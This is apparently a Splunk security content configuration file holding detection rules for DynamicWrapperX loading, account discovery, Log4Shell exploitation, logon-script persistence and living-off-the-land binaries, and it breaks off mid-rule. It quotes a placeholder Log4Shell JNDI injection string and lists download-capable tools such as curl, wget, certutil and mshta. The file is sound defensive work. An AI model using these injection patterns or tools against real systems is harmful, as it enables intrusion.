relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime sum(All_Risk.calculated_risk_score) as risk_score, count(All_Risk.calculated_risk_score) as risk_event_count, values(All_Risk.annotations.mitre_attack.mitre_tactic_id) as annotations.mitre_attack.mitre_tactic_id, dc(All_Risk.annotations.mitre_attack.mitre_tactic_id) as mitre_tactic_id_count, values(All_Risk.annotations.mitre_attack.mitre_technique_id) as annotations.mitre_attack.mitre_technique_id, dc(All_Risk.annotations.mitre_attack.mitre_technique_id) as mitre_technique_id_count, values(All_Risk.tag) as tag, values(source) as source, dc(source) as source_count from datamodel=Risk.All_Risk where All_Risk.analyticstories="Living Off The Land" All_Risk.risk_object_type="system" by All_Risk.risk_object All_Risk.risk_object_type All_Risk.annotations.mitre_attack.mitre_tactic | `drop_dm_object_name(All_Risk)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where source_count >= 5 | `living_off_the_land_filter` [ESCU - Loading Of Dynwrapx Module - Rule] action.escu = 0 action.escu.enabled = 1 description = DynamicWrapperX is an ActiveX component that can be used in a script to call Windows API functions, but it requires the dynwrapx.dll to be installed and registered. With that, registering or loading dynwrapx.dll to a host is highly suspicious. In most instances when it is used maliciously, the best way to triage is to review parallel processes and pivot on the process_guid. Review the registry for any suspicious modifications meant to load dynwrapx.dll. Identify any suspicious module loads of dynwrapx.dll. This detection will return and identify the processes that invoke vbs/wscript/cscript. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055", "T1055.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = DynamicWrapperX is an ActiveX component that can be used in a script to call Windows API functions, but it requires the dynwrapx.dll to be installed and registered. With that, registering or loading dynwrapx.dll to a host is highly suspicious. In most instances when it is used maliciously, the best way to triage is to review parallel processes and pivot on the process_guid. Review the registry for any suspicious modifications meant to load dynwrapx.dll. Identify any suspicious module loads of dynwrapx.dll. This detection will return and identify the processes that invoke vbs/wscript/cscript. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on processes that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` and `Filesystem` node. In addition, confirm the latest CIM App 4.20 or higher is installed and the latest TA for the endpoint product. action.escu.known_false_positives = False positives should be limited, however it is possible to filter by Processes.process_name and specific processes (ex. wscript.exe). Filter as needed. This may need modification based on EDR telemetry and how it brings in registry data. For example, removal of (Default). action.escu.creation_date = 2021-11-18 action.escu.modification_date = 2021-11-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Loading Of Dynwrapx Module - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Remcos", "AsyncRAT"] action.risk = 1 action.risk.param._risk_message = dynwrapx.dll loaded by process $process_name$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Loading Of Dynwrapx Module - Rule action.correlationsearch.annotations = {"analytic_story": ["Remcos", "AsyncRAT"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055", "T1055.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = DynamicWrapperX is an ActiveX component that can be used in a script to call Windows API functions, but it requires the dynwrapx.dll to be installed and registered. With that, registering or loading dynwrapx.dll to a host is highly suspicious. In most instances when it is used maliciously, the best way to triage is to review parallel processes and pivot on the process_guid. Review the registry for any suspicious modifications meant to load dynwrapx.dll. Identify any suspicious module loads of dynwrapx.dll. This detection will return and identify the processes that invoke vbs/wscript/cscript. action.notable.param.rule_title = Loading Of Dynwrapx Module action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=7 (ImageLoaded = "*\\dynwrapx.dll" OR OriginalFileName = "dynwrapx.dll" OR Product = "DynamicWrapperX") | stats count min(_time) as firstTime max(_time) as lastTime by Image ImageLoaded OriginalFileName Product process_name dest EventCode Signed ProcessId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `loading_of_dynwrapx_module_filter` [ESCU - Local Account Discovery with Net - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `net.exe` or `net1.exe` with command-line arguments utilized to query for local users. The two arguments `user` and 'users', return a list of all local users. Red Teams and adversaries alike use net.exe to enumerate users for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.001"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `net.exe` or `net1.exe` with command-line arguments utilized to query for local users. The two arguments `user` and 'users', return a list of all local users. Red Teams and adversaries alike use net.exe to enumerate users for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-09-16 action.escu.modification_date = 2021-09-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Local Account Discovery with Net - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery", "Sandworm Tools"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Local Account Discovery with Net - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "Sandworm Tools"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` (Processes.process=*user OR Processes.process=*users) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `local_account_discovery_with_net_filter` [ESCU - Local Account Discovery With Wmic - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to query for local users. The argument `useraccount` is used to leverage WMI to return a list of all local users. Red Teams and adversaries alike use net.exe to enumerate users for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.001"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to query for local users. The argument `useraccount` is used to leverage WMI to return a list of all local users. Red Teams and adversaries alike use net.exe to enumerate users for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-09-16 action.escu.modification_date = 2021-09-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Local Account Discovery With Wmic - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Local Account Discovery With Wmic - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_wmic` (Processes.process=*useraccount*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `local_account_discovery_with_wmic_filter` [ESCU - Log4Shell CVE-2021-44228 Exploitation - Rule] action.escu = 0 action.escu.enabled = 1 description = This correlation find exploitation of Log4Shell CVE-2021-44228 against systems using detections from Splunk Security Content Analytic Story. It does this by calculating the distinct count of MITRE ATT&CK tactics from Log4Shell detections fired. If the count is larger than 2 or more distinct MITRE ATT&CK tactics we assume high problability of exploitation. The Analytic story breaks down into 3 major phases of a Log4Shell exploitation, specifically> Initial Payload delivery eg. `${jndi:ldap://PAYLOAD_INJECTED}` Call back to malicious LDAP server eg. Exploit.class Post Exploitation Activity/Lateral Movement using Powershell or similar T1562.001 Each of these phases fall into different MITRE ATT&CK Tactics (Initial Access, Execution, Command And Control), by looking into 2 or more phases showing up in detections triggerd is how this correlation search finds exploitation. If we get a notable from this correlation search the best way to triage it is by investigating the affected systems against Log4Shell exploitation using Splunk SOAR playbooks. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control", "Delivery", "Installation"], "mitre_attack": ["T1105", "T1190", "T1059", "T1133"], "nist": ["DE.AE"]} action.escu.data_models = ["Risk"] action.escu.eli5 = This correlation find exploitation of Log4Shell CVE-2021-44228 against systems using detections from Splunk Security Content Analytic Story. It does this by calculating the distinct count of MITRE ATT&CK tactics from Log4Shell detections fired. If the count is larger than 2 or more distinct MITRE ATT&CK tactics we assume high problability of exploitation. The Analytic story breaks down into 3 major phases of a Log4Shell exploitation, specifically> Initial Payload delivery eg. `${jndi:ldap://PAYLOAD_INJECTED}` Call back to malicious LDAP server eg. Exploit.class Post Exploitation Activity/Lateral Movement using Powershell or similar T1562.001 Each of these phases fall into different MITRE ATT&CK Tactics (Initial Access, Execution, Command And Control), by looking into 2 or more phases showing up in detections triggerd is how this correlation search finds exploitation. If we get a notable from this correlation search the best way to triage it is by investigating the affected systems against Log4Shell exploitation using Splunk SOAR playbooks. action.escu.how_to_implement = To implement this correlation search a user needs to enable all detections in the Log4Shell Analytic Story and confirm it is generation risk events. A simple search `index=risk analyticstories="Log4Shell CVE-2021-44228"` should contain events. action.escu.known_false_positives = There are no known false positive for this search, but it could contain false positives as multiple detections can trigger and not have successful exploitation. action.escu.creation_date = 2022-09-09 action.escu.modification_date = 2022-09-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Log4Shell CVE-2021-44228 Exploitation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Log4Shell CVE-2021-44228", "CISA AA22-320A"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - RIR - Log4Shell CVE-2021-44228 Exploitation - Rule action.correlationsearch.annotations = {"analytic_story": ["Log4Shell CVE-2021-44228", "CISA AA22-320A"], "cis20": ["CIS 10"], "confidence": 70, "impact": 90, "kill_chain_phases": ["Command and Control", "Delivery", "Installation"], "mitre_attack": ["T1105", "T1190", "T1059", "T1133"], "nist": ["DE.AE"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This correlation find exploitation of Log4Shell CVE-2021-44228 against systems using detections from Splunk Security Content Analytic Story. It does this by calculating the distinct count of MITRE ATT&CK tactics from Log4Shell detections fired. If the count is larger than 2 or more distinct MITRE ATT&CK tactics we assume high problability of exploitation. The Analytic story breaks down into 3 major phases of a Log4Shell exploitation, specifically> Initial Payload delivery eg. `${jndi:ldap://PAYLOAD_INJECTED}` Call back to malicious LDAP server eg. Exploit.class Post Exploitation Activity/Lateral Movement using Powershell or similar T1562.001 Each of these phases fall into different MITRE ATT&CK Tactics (Initial Access, Execution, Command And Control), by looking into 2 or more phases showing up in detections triggerd is how this correlation search finds exploitation. If we get a notable from this correlation search the best way to triage it is by investigating the affected systems against Log4Shell exploitation using Splunk SOAR playbooks. action.notable.param.rule_title = RBA: Log4Shell CVE-2021-44228 Exploitation action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime sum(All_Risk.calculated_risk_score) as risk_score, count(All_Risk.calculated_risk_score) as risk_event_count, values(All_Risk.annotations.mitre_attack.mitre_tactic_id) as annotations.mitre_attack.mitre_tactic_id, dc(All_Risk.annotations.mitre_attack.mitre_tactic_id) as mitre_tactic_id_count, values(All_Risk.annotations.mitre_attack.mitre_technique_id) as annotations.mitre_attack.mitre_technique_id, dc(All_Risk.annotations.mitre_attack.mitre_technique_id) as mitre_technique_id_count, values(All_Risk.tag) as tag, values(source) as source, dc(source) as source_count from datamodel=Risk.All_Risk where All_Risk.analyticstories="Log4Shell CVE-2021-44228" All_Risk.risk_object_type="system" by All_Risk.risk_object All_Risk.risk_object_type All_Risk.annotations.mitre_attack.mitre_tactic | `drop_dm_object_name(All_Risk)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where source_count >= 2 | `log4shell_cve_2021_44228_exploitation_filter` [ESCU - Logon Script Event Trigger Execution - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious modification of registry entry to persist and gain privilege escalation upon booting up of compromised host. This technique was seen in several APT and malware where it modify UserInitMprLogonScript registry entry to its malicious payload to be executed upon boot up of the machine. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1037", "T1037.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a suspicious modification of registry entry to persist and gain privilege escalation upon booting up of compromised host. This technique was seen in several APT and malware where it modify UserInitMprLogonScript registry entry to its malicious payload to be executed upon boot up of the machine. action.escu.how_to_implement = To successfully implement this search, you must be ingesting data that records registry activity from your hosts to populate the endpoint data model in the registry node. This is typically populated via endpoint detection-and-response product, such as Carbon Black or endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report reads and writes to the registry. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Logon Script Event Trigger Execution - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Data Destruction", "Windows Privilege Escalation", "Hermetic Wiper", "Windows Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = modified/added/deleted registry entry $Registry.registry_path$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Logon Script Event Trigger Execution - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Windows Privilege Escalation", "Hermetic Wiper", "Windows Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1037", "T1037.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious modification of registry entry to persist and gain privilege escalation upon booting up of compromised host. This technique was seen in several APT and malware where it modify UserInitMprLogonScript registry entry to its malicious payload to be executed upon boot up of the machine. action.notable.param.rule_title = Logon Script Event Trigger Execution action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path IN ("*\\Environment\\UserInitMprLogonScript") by Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `drop_dm_object_name(Registry)` | `logon_script_event_trigger_execution_filter` [ESCU - LOLBAS With Network Traffic - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies LOLBAS with network traffic. When adversaries abuse LOLBAS they are often used to download malicious code or executables. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like downloading malicious code. Looking for these process can help defenders identify lateral movement, command-and-control, or exfiltration activies. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Command and Control", "Actions on Objectives", "Exploitation"], "mitre_attack": ["T1105", "T1567", "T1218"], "nist": ["DE.CM"]} action.escu.data_models = ["Network_Traffic"] action.escu.eli5 = The following analytic identifies LOLBAS with network traffic. When adversaries abuse LOLBAS they are often used to download malicious code or executables. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like downloading malicious code. Looking for these process can help defenders identify lateral movement, command-and-control, or exfiltration activies. action.escu.how_to_implement = To successfully implement this detection you must ingest events into the Network traffic data model that contain the source, destination, and communicating process in the app feild. Relevant processes must also be ingested in the Endpoint data model with matching process_id feild. Sysmon EID1 and EID3 are good examples of this type this data type. action.escu.known_false_positives = Legitmate usage of internal automation or scripting, espically powershell.exe internal to internal or logon scripts. It may be necessary to omit internal IP ranges if extremely noisy. ie NOT dest_ip IN ("10.0.0.0/8","172.16.0.0/12","192.168.0.0/16","170.98.0.0/16","0:0:0:0:0:0:0:1") action.escu.creation_date = 2021-12-09 action.escu.modification_date = 2021-12-09 action.escu.confidence = high action.escu.full_search_name = ESCU - LOLBAS With Network Traffic - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Living Off The Land"] action.risk = 1 action.risk.param._risk_message = The LOLBAS $process_name$ on device $src$ was seen communicating with $dest$. action.risk.param._risk = [{"risk_object_field": "src", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - LOLBAS With Network Traffic - Rule action.correlationsearch.annotations = {"analytic_story": ["Living Off The Land"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Command and Control", "Actions on Objectives", "Exploitation"], "mitre_attack": ["T1105", "T1567", "T1218"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies LOLBAS with network traffic. When adversaries abuse LOLBAS they are often used to download malicious code or executables. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like downloading malicious code. Looking for these process can help defenders identify lateral movement, command-and-control, or exfiltration activies. action.notable.param.rule_title = LOLBAS With Network Traffic action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Network_Traffic.All_Traffic where (All_Traffic.app IN ("*Regsvcs.exe", "*\\Ftp.exe", "*OfflineScannerShell.exe", "*Rasautou.exe", "*Schtasks.exe", "*Xwizard.exe", "*Pnputil.exe", "*Atbroker.exe", "*Pcwrun.exe", "*Ttdinject.exe", "*Mshta.exe", "*Bitsadmin.exe", "*Certoc.exe", "*Ieexec.exe", "*Microsoft.Workflow.Compiler.exe", "*Runscripthelper.exe", "*Forfiles.exe", "*Msbuild.exe", "*Register-cimprovider.exe", "*Tttracer.exe", "*Ie4uinit.exe", "*Bash.exe", "*Hh.exe", "*SettingSyncHost.exe", "*Cmstp.exe", "*Stordiag.exe", "*Scriptrunner.exe", "*Odbcconf.exe", "*Extexport.exe", "*Msdt.exe", "*WorkFolders.exe", "*Diskshadow.exe", "*Mavinject.exe", "*Regasm.exe", "*Gpscript.exe", "*Regsvr32.exe", "*Msiexec.exe", "*Wuauclt.exe", "*Presentationhost.exe", "*Wmic.exe", "*Runonce.exe", "*Syncappvpublishingserver.exe", "*Verclsid.exe", "*Infdefaultinstall.exe", "*Installutil.exe", "*Netsh.exe", "*Wab.exe", "*Dnscmd.exe", "*\\At.exe", "*Pcalua.exe", "*Msconfig.exe", "*makecab.exe", "*cscript.exe", "*notepad.exe", "*\\cmd.exe", "*certutil.exe", "*\\powershell.exe", "*powershell_ise.exe")) by All_Traffic.app,All_Traffic.src,All_Traffic.src_ip,All_Traffic.user,All_Traffic.dest,All_Traffic.dest_ip | `drop_dm_object_name(All_Traffic)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rex field=app ".*\\\(?.*)$" | rename app as process | `lolbas_with_network_traffic_filter` [ESCU - MacOS - Re-opened Applications - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for processes referencing the plist files that determine which applications are re-opened when a user reboots their machine. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for processes referencing the plist files that determine which applications are re-opened when a user reboots their machine. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = At this stage, there are no known false positives. During testing, no process events refering the com.apple.loginwindow.plist files were observed during normal operation of re-opening applications on reboot. Therefore, it can be asumed that any occurences of this in the process events would be worth investigating. In the event that the legitimate modification by the system of these files is in fact logged to the process log, then the process_name of that process can be added to an allow list. action.escu.creation_date = 2020-02-07 action.escu.modification_date = 2020-02-07 action.escu.confidence = high action.escu.full_search_name = ESCU - MacOS - Re-opened Applications - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["ColdRoot MacOS RAT"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - MacOS - Re-opened Applications - Rule action.correlationsearch.annotations = {"analytic_story": ["ColdRoot MacOS RAT"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for processes referencing the plist files that determine which applications are re-opened when a user reboots their machine. action.notable.param.rule_title = MacOS - Re-opened Applications action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*com.apple.loginwindow*" by Processes.user Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `macos___re_opened_applications_filter` [ESCU - MacOS LOLbin - Rule] action.escu = 0 action.escu.enabled = 1 description = Detect multiple executions of Living off the Land (LOLbin) binaries in a short period of time. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.004", "T1059"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = Detect multiple executions of Living off the Land (LOLbin) binaries in a short period of time. action.escu.how_to_implement = This detection uses osquery and endpoint security on MacOS. Follow the link in references, which describes how to setup process auditing in MacOS with endpoint security and osquery. action.escu.known_false_positives = None identified. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - MacOS LOLbin - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Living Off The Land"] action.risk = 1 action.risk.param._risk_message = Multiplle LOLbin are executed on host $dest$ by user $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - MacOS LOLbin - Rule action.correlationsearch.annotations = {"analytic_story": ["Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.004", "T1059"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Detect multiple executions of Living off the Land (LOLbin) binaries in a short period of time. action.notable.param.rule_title = MacOS LOLbin action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `osquery` name=es_process_events columns.cmdline IN ("find*", "crontab*", "screencapture*", "openssl*", "curl*", "wget*", "killall*", "funzip*") | rename columns.* as * | stats min(_time) as firstTime max(_time) as lastTime values(cmdline) as cmdline, values(pid) as pid, values(parent) as parent, values(path) as path, values(signing_id) as signing_id, dc(path) as dc_path by username host | rename username as user, cmdline as process, path as process_path, host as dest | where dc_path > 3 | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `macos_lolbin_filter` [ESCU - MacOS plutil - Rule] action.escu = 0 action.escu.enabled = 1 description = Detect usage of plutil to modify plist files. Adversaries can modiy plist files to executed binaries or add command line arguments. Plist files in auto-run locations are executed upon user logon or system startup. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1647"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = Detect usage of plutil to modify plist files. Adversaries can modiy plist files to executed binaries or add command line arguments. Plist files in auto-run locations are executed upon user logon or system startup. action.escu.how_to_implement = This detection uses osquery and endpoint security on MacOS. Follow the link in references, which describes how to setup process auditing in MacOS with endpoint security and osquery. action.escu.known_false_positives = Administrators using plutil to change plist files. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - MacOS plutil - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Living Off The Land"] action.risk = 1 action.risk.param._risk_message = plutil are executed on $dest$ from 